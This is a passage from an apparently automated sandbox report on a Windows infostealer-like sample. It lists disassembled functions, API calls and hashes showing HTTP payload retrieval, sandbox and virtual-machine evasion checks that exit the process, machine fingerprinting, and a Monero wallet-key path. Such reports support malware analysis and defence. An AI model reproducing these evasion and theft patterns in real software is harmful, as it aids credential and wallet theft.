                                • GetProcAddress.KERNEL32(75A70000,00DAD288), ref: 00EDA497
                                • GetProcAddress.KERNEL32(75450000,00D95930), ref: 00EDA4B8
                                • GetProcAddress.KERNEL32(75450000,00D95830), ref: 00EDA4D1
                                • GetProcAddress.KERNEL32(75DA0000,00D95990), ref: 00EDA4F2
                                • GetProcAddress.KERNEL32(75DA0000,00DAD120), ref: 00EDA50A
                                • GetProcAddress.KERNEL32(6F070000,00D95810), ref: 00EDA530
                                • GetProcAddress.KERNEL32(6F070000,00D956D0), ref: 00EDA548
                                • GetProcAddress.KERNEL32(6F070000,00D95850), ref: 00EDA560
                                • GetProcAddress.KERNEL32(6F070000,00DAD0D8), ref: 00EDA579
                                • GetProcAddress.KERNEL32(6F070000,00D958F0), ref: 00EDA591
                                • GetProcAddress.KERNEL32(6F070000,00D95950), ref: 00EDA5A9
                                • GetProcAddress.KERNEL32(6F070000,00D95690), ref: 00EDA5C2
                                • GetProcAddress.KERNEL32(6F070000,00D95910), ref: 00EDA5DA
                                • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00EDA5F1
                                • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00EDA607
                                • GetProcAddress.KERNEL32(75AF0000,00DAD2B8), ref: 00EDA629
                                • GetProcAddress.KERNEL32(75AF0000,00DA8E08), ref: 00EDA641
                                • GetProcAddress.KERNEL32(75AF0000,00DAD138), ref: 00EDA659
                                • GetProcAddress.KERNEL32(75AF0000,00DAD2D0), ref: 00EDA672
                                • GetProcAddress.KERNEL32(75D90000,00D95730), ref: 00EDA693
                                • GetProcAddress.KERNEL32(6E470000,00DAD2E8), ref: 00EDA6B4
                                • GetProcAddress.KERNEL32(6E470000,00D95970), ref: 00EDA6CD
                                • GetProcAddress.KERNEL32(6E470000,00DAD1E0), ref: 00EDA6E5
                                • GetProcAddress.KERNEL32(6E470000,00DAD300), ref: 00EDA6FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: HttpQueryInfoA$InternetSetOptionA
                                • API String ID: 2238633743-1775429166
                                • Opcode ID: 60820eeab104f5740b05a22b1d3c2882e192b71d68977f39c773e8b8d346bf67
                                • Instruction ID: 5363d1f480e521ee60601923a45c3fc1e8255b7e512b5ad92d5b683751ce2cc6
                                • Opcode Fuzzy Hash: 60820eeab104f5740b05a22b1d3c2882e192b71d68977f39c773e8b8d346bf67
                                • Instruction Fuzzy Hash: 21620AB5D10700AFC36EDBA8F99895637F9FF8C301714853AA626C324CD6BA95C1DB50
                                Function 00EC6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1033 ec6280-ec630b call eda7a0 call ec47b0 call eda740 InternetOpenA StrCmpCA 1040 ec630d 1033->1040 1041 ec6314-ec6318 1033->1041 1040->1041 1042 ec631e-ec6342 InternetConnectA 1041->1042 1043 ec6509-ec6525 call eda7a0 call eda800 * 2 1041->1043 1045 ec64ff-ec6503 InternetCloseHandle 1042->1045 1046 ec6348-ec634c 1042->1046 1062 ec6528-ec652d 1043->1062 1045->1043 1048 ec634e-ec6358 1046->1048 1049 ec635a 1046->1049 1051 ec6364-ec6392 HttpOpenRequestA 1048->1051 1049->1051 1053 ec6398-ec639c 1051->1053 1054 ec64f5-ec64f9 InternetCloseHandle 1051->1054 1055 ec639e-ec63bf InternetSetOptionA 1053->1055 1056 ec63c5-ec6405 HttpSendRequestA HttpQueryInfoA 1053->1056 1054->1045 1055->1056 1058 ec642c-ec644b call ed8940 1056->1058 1059 ec6407-ec6427 call eda740 call eda800 * 2 1056->1059 1067 ec644d-ec6454 1058->1067 1068 ec64c9-ec64e9 call eda740 call eda800 * 2 1058->1068 1059->1062 1071 ec6456-ec6480 InternetReadFile 1067->1071 1072 ec64c7-ec64ef InternetCloseHandle 1067->1072 1068->1062 1076 ec648b 1071->1076 1077 ec6482-ec6489 1071->1077 1072->1054 1076->1072 1077->1076 1080 ec648d-ec64c5 call eda9b0 call eda8a0 call eda800 1077->1080 1080->1071
                                APIs
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EC47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EC4839
                                  • Part of subcall function 00EC47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EC4849
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • InternetOpenA.WININET(00EE0DFE,00000001,00000000,00000000,00000000), ref: 00EC62E1
                                • StrCmpCA.SHLWAPI(?,00DAE9C0), ref: 00EC6303
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EC6335
                                • HttpOpenRequestA.WININET(00000000,GET,?,00DAE388,00000000,00000000,00400100,00000000), ref: 00EC6385
                                • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EC63BF
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EC63D1
                                • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00EC63FD
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00EC646D
                                • InternetCloseHandle.WININET(00000000), ref: 00EC64EF
                                • InternetCloseHandle.WININET(00000000), ref: 00EC64F9
                                • InternetCloseHandle.WININET(00000000), ref: 00EC6503
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                • String ID: ERROR$ERROR$GET
                                • API String ID: 3749127164-2509457195
                                • Opcode ID: 1fc073191935304027b2bee37acd14ebe901e7a5b8307ad869d275574d6fae76
                                • Instruction ID: 4faf9c343916c4719918b08bc4c6ef8cee0c9e15235901a289acdbad909ce40d
                                • Opcode Fuzzy Hash: 1fc073191935304027b2bee37acd14ebe901e7a5b8307ad869d275574d6fae76
                                • Instruction Fuzzy Hash: 9E713B71A00358ABDB28DB90DC49FEE77B4FB44700F1091A9F50A7B284DBB56A86CF51
                                Function 00ED5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1090 ed5510-ed5577 call ed5ad0 call eda820 * 3 call eda740 * 4 1106 ed557c-ed5583 1090->1106 1107 ed5585-ed55b6 call eda820 call eda7a0 call ec1590 call ed51f0 1106->1107 1108 ed55d7-ed564c call eda740 * 2 call ec1590 call ed52c0 call eda8a0 call eda800 call edaad0 StrCmpCA 1106->1108 1124 ed55bb-ed55d2 call eda8a0 call eda800 1107->1124 1134 ed5693-ed56a9 call edaad0 StrCmpCA 1108->1134 1138 ed564e-ed568e call eda7a0 call ec1590 call ed51f0 call eda8a0 call eda800 1108->1138 1124->1134 1139 ed57dc-ed5844 call eda8a0 call eda820 * 2 call ec1670 call eda800 * 4 call ed6560 call ec1550 1134->1139 1140 ed56af-ed56b6 1134->1140 1138->1134 1269 ed5ac3-ed5ac6 1139->1269 1142 ed56bc-ed56c3 1140->1142 1143 ed57da-ed585f call edaad0 StrCmpCA 1140->1143 1147 ed571e-ed5793 call eda740 * 2 call ec1590 call ed52c0 call eda8a0 call eda800 call edaad0 StrCmpCA 1142->1147 1148 ed56c5-ed5719 call eda820 call eda7a0 call ec1590 call ed51f0 call eda8a0 call eda800 1142->1148 1162 ed5865-ed586c 1143->1162 1163 ed5991-ed59f9 call eda8a0 call eda820 * 2 call ec1670 call eda800 * 4 call ed6560 call ec1550 1143->1163 1147->1143 1246 ed5795-ed57d5 call eda7a0 call ec1590 call ed51f0 call eda8a0 call eda800 1147->1246 1148->1143 1169 ed598f-ed5a14 call edaad0 StrCmpCA 1162->1169 1170 ed5872-ed5879 1162->1170 1163->1269 1198 ed5a28-ed5a91 call eda8a0 call eda820 * 2 call ec1670 call eda800 * 4 call ed6560 call ec1550 1169->1198 1199 ed5a16-ed5a21 Sleep 1169->1199 1177 ed587b-ed58ce call eda820 call eda7a0 call ec1590 call ed51f0 call eda8a0 call eda800 1170->1177 1178 ed58d3-ed5948 call eda740 * 2 call ec1590 call ed52c0 call eda8a0 call eda800 call edaad0 StrCmpCA 1170->1178 1177->1169 1178->1169 1275 ed594a-ed598a call eda7a0 call ec1590 call ed51f0 call eda8a0 call eda800 1178->1275 1198->1269 1199->1106 1246->1143 1275->1169
                                APIs
                                  • Part of subcall function 00EDA820: lstrlen.KERNEL32(00EC4F05,?,?,00EC4F05,00EE0DDE), ref: 00EDA82B
                                  • Part of subcall function 00EDA820: lstrcpy.KERNEL32(00EE0DDE,00000000), ref: 00EDA885
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00ED5644
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00ED56A1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00ED5857
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00ED51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00ED5228
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00ED52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00ED5318
                                  • Part of subcall function 00ED52C0: lstrlen.KERNEL32(00000000), ref: 00ED532F
                                  • Part of subcall function 00ED52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00ED5364
                                  • Part of subcall function 00ED52C0: lstrlen.KERNEL32(00000000), ref: 00ED5383
                                  • Part of subcall function 00ED52C0: lstrlen.KERNEL32(00000000), ref: 00ED53AE
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00ED578B
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00ED5940
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00ED5A0C
                                • Sleep.KERNEL32(0000EA60), ref: 00ED5A1B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen$Sleep
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 507064821-2791005934
                                • Opcode ID: 34558fc43bf4df0f55cff4d29951a9c9adafeaa1c61537f50c9e6aad13c39bae
                                • Instruction ID: caff34d595388edf75ecb8cc2021cc3b39343bf0fb2775f94ad931a11aa03269
                                • Opcode Fuzzy Hash: 34558fc43bf4df0f55cff4d29951a9c9adafeaa1c61537f50c9e6aad13c39bae
                                • Instruction Fuzzy Hash: 74E188769102049ACB18FBA0ED56EED73B8EF54300F44A13AB41677285EF715B4BCB92
                                Function 00ED17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1301 ed17a0-ed17cd call edaad0 StrCmpCA 1304 ed17cf-ed17d1 ExitProcess 1301->1304 1305 ed17d7-ed17f1 call edaad0 1301->1305 1309 ed17f4-ed17f8 1305->1309 1310 ed17fe-ed1811 1309->1310 1311 ed19c2-ed19cd call eda800 1309->1311 1313 ed199e-ed19bd 1310->1313 1314 ed1817-ed181a 1310->1314 1313->1309 1316 ed18ad-ed18be StrCmpCA 1314->1316 1317 ed18cf-ed18e0 StrCmpCA 1314->1317 1318 ed198f-ed1999 call eda820 1314->1318 1319 ed1849-ed1858 call eda820 1314->1319 1320 ed1821-ed1830 call eda820 1314->1320 1321 ed185d-ed186e StrCmpCA 1314->1321 1322 ed187f-ed1890 StrCmpCA 1314->1322 1323 ed1835-ed1844 call eda820 1314->1323 1324 ed18f1-ed1902 StrCmpCA 1314->1324 1325 ed1951-ed1962 StrCmpCA 1314->1325 1326 ed1970-ed1981 StrCmpCA 1314->1326 1327 ed1913-ed1924 StrCmpCA 1314->1327 1328 ed1932-ed1943 StrCmpCA 1314->1328 1346 ed18ca 1316->1346 1347 ed18c0-ed18c3 1316->1347 1348 ed18ec 1317->1348 1349 ed18e2-ed18e5 1317->1349 1318->1313 1319->1313 1320->1313 1342 ed187a 1321->1342 1343 ed1870-ed1873 1321->1343 1344 ed189e-ed18a1 1322->1344 1345 ed1892-ed189c 1322->1345 1323->1313 1350 ed190e 1324->1350 1351 ed1904-ed1907 1324->1351 1333 ed196e 1325->1333 1334 ed1964-ed1967 1325->1334 1336 ed198d 1326->1336 1337 ed1983-ed1986 1326->1337 1329 ed1926-ed1929 1327->1329 1330 ed1930 1327->1330 1331 ed194f 1328->1331 1332 ed1945-ed1948 1328->1332 1329->1330 1330->1313 1331->1313 1332->1331 1333->1313 1334->1333 1336->1313 1337->1336 1342->1313 1343->1342 1355 ed18a8 1344->1355 1345->1355 1346->1313 1347->1346 1348->1313 1349->1348 1350->1313 1351->1350 1355->1313
                                APIs
                                • StrCmpCA.SHLWAPI(00000000,block), ref: 00ED17C5
                                • ExitProcess.KERNEL32 ref: 00ED17D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: 5a9a01f0dbc77408e909b608a05079288decd58f15e4f5a99f2d93ae6ffc4e41
                                • Instruction ID: c87541d536a822299f0a28fa26f047f1c4ac951651fe045d74b424087a806349
                                • Opcode Fuzzy Hash: 5a9a01f0dbc77408e909b608a05079288decd58f15e4f5a99f2d93ae6ffc4e41
                                • Instruction Fuzzy Hash: 04515D74A04209FBCB08DFA1D964ABE77B5EF44304F14A09AE41577340D7B1AA92DB61
                                Function 00ED7500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1356 ed7500-ed754a GetWindowsDirectoryA 1357 ed754c 1356->1357 1358 ed7553-ed75c7 GetVolumeInformationA call ed8d00 * 3 1356->1358 1357->1358 1365 ed75d8-ed75df 1358->1365 1366 ed75fc-ed7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 ed75e1-ed75fa call ed8d00 1365->1367 1368 ed7619-ed7626 call eda740 1366->1368 1369 ed7628-ed7658 wsprintfA call eda740 1366->1369 1367->1365 1377 ed767e-ed768e 1368->1377 1369->1377
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00ED7542
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00ED757F
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00ED7603
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED760A
                                • wsprintfA.USER32 ref: 00ED7640
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                • String ID: :$C$\$
                                • API String ID: 1544550907-3109660283
                                • Opcode ID: 28645bd24926bdf46ce1472992cfced0ca6bd9a87783de69025c004d2c84672f
                                • Instruction ID: c2028bef5224c297fe6cc0d200e299e3455a1a1d55021bc646953b282c8cee38
                                • Opcode Fuzzy Hash: 28645bd24926bdf46ce1472992cfced0ca6bd9a87783de69025c004d2c84672f
                                • Instruction Fuzzy Hash: A2418FB1D04358ABDB11DF94DC45BEEBBB8EF08704F10009AF50977280E774AA85CBA5
                                Function 00ED69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(74DD0000,00DA2338), ref: 00ED98A1
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(74DD0000,00DA21B8), ref: 00ED98BA
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(74DD0000,00DA2380), ref: 00ED98D2
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(74DD0000,00DA2230), ref: 00ED98EA
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(74DD0000,00DA21D0), ref: 00ED9903
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(74DD0000,00DA8E48), ref: 00ED991B
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(74DD0000,00D95210), ref: 00ED9933
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(74DD0000,00D953D0), ref: 00ED994C
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(74DD0000,00DA22F0), ref: 00ED9964
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(74DD0000,00DA2398), ref: 00ED997C
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(74DD0000,00DA2248), ref: 00ED9995
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(74DD0000,00DA2350), ref: 00ED99AD
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(74DD0000,00D95410), ref: 00ED99C5
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(74DD0000,00DA2368), ref: 00ED99DE
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EC11D0: ExitProcess.KERNEL32 ref: 00EC1211
                                  • Part of subcall function 00EC1160: GetSystemInfo.KERNEL32(?), ref: 00EC116A
                                  • Part of subcall function 00EC1160: ExitProcess.KERNEL32 ref: 00EC117E
                                  • Part of subcall function 00EC1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00EC112B
                                  • Part of subcall function 00EC1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00EC1132
                                  • Part of subcall function 00EC1110: ExitProcess.KERNEL32 ref: 00EC1143
                                  • Part of subcall function 00EC1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00EC123E
                                  • Part of subcall function 00EC1220: ExitProcess.KERNEL32 ref: 00EC1294
                                  • Part of subcall function 00ED6770: GetUserDefaultLangID.KERNEL32 ref: 00ED6774
                                  • Part of subcall function 00EC1190: ExitProcess.KERNEL32 ref: 00EC11C6
                                  • Part of subcall function 00ED7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EC11B7), ref: 00ED7880
                                  • Part of subcall function 00ED7850: RtlAllocateHeap.NTDLL(00000000), ref: 00ED7887
                                  • Part of subcall function 00ED7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00ED789F
                                  • Part of subcall function 00ED78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00ED7910
                                  • Part of subcall function 00ED78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00ED7917
                                  • Part of subcall function 00ED78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00ED792F
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00DA8FB8,?,00EE110C,?,00000000,?,00EE1110,?,00000000,00EE0AEF), ref: 00ED6ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00ED6AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00ED6AF9
                                • Sleep.KERNEL32(00001770), ref: 00ED6B04
                                • CloseHandle.KERNEL32(?,00000000,?,00DA8FB8,?,00EE110C,?,00000000,?,00EE1110,?,00000000,00EE0AEF), ref: 00ED6B1A
                                • ExitProcess.KERNEL32 ref: 00ED6B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
